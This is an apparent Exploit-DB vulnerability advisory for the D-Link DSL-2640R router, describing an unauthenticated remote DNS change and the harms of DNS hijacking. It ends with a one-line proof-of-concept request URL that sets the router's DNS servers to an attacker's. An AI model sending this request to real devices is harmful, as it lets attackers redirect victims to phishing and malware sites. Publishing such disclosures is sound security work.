D-Link DSL-2640R - DNS Change

EDB-ID:

43678

CVE:

N/A




Platform:

Hardware

Date:

2018-01-17


#
#
#  D-Link DSL-2640R Unauthenticated Remote DNS Change Vulnerability
#
#  Firmware Version: UK_1.06 Hardware Version: B1
#
#  Copyright 2018 (c) Todor Donev <todor.donev at gmail.com>
#
#  https://ethical-hacker.org/
#  https://facebook.com/ethicalhackerorg/
#
#  Description:  
#  The vulnerability exist in the web interface.
#  D-Link's various routers are susceptible to unauthorized DNS change. 
#  The problem is when entering an invalid / wrong user and password.  
#
#  ACCORDING TO THE VULNERABILITY DISCOVERER, MORE D-Link 
#  DEVICES MAY AFFECTED.
#
#  Once modified, systems use foreign DNS servers,  which are 
#  usually set up by cybercriminals. Users with vulnerable 
#  systems or devices who try to access certain sites are 
#  instead redirected to possibly malicious sites.
#  
#  Modifying systems' DNS settings allows cybercriminals to 
#  perform malicious activities like:
#
#    o  Steering unknowing users to bad sites: 
#       These sites can be phishing pages that 
#       spoof well-known sites in order to 
#       trick users into handing out sensitive 
#       information.
#
#    o  Replacing ads on legitimate sites: 
#       Visiting certain sites can serve users 
#       with infected systems a different set 
#       of ads from those whose systems are 
#       not infected.
#   
#    o  Controlling and redirecting network traffic: 
#       Users of infected systems may not be granted 
#       access to download important OS and software 
#       updates from vendors like Microsoft and from 
#       their respective security vendors.
#
#    o  Pushing additional malware: 
#       Infected systems are more prone to other 
#       malware infections (e.g., FAKEAV infection).
#
#  

Proof of Concept:

http://<TARGET>/Forms/dns_1?Enable_DNSFollowing=1&dnsPrimary=<MALICIOUS DNS>&dnsSecondary=<MALICIOUS DNS>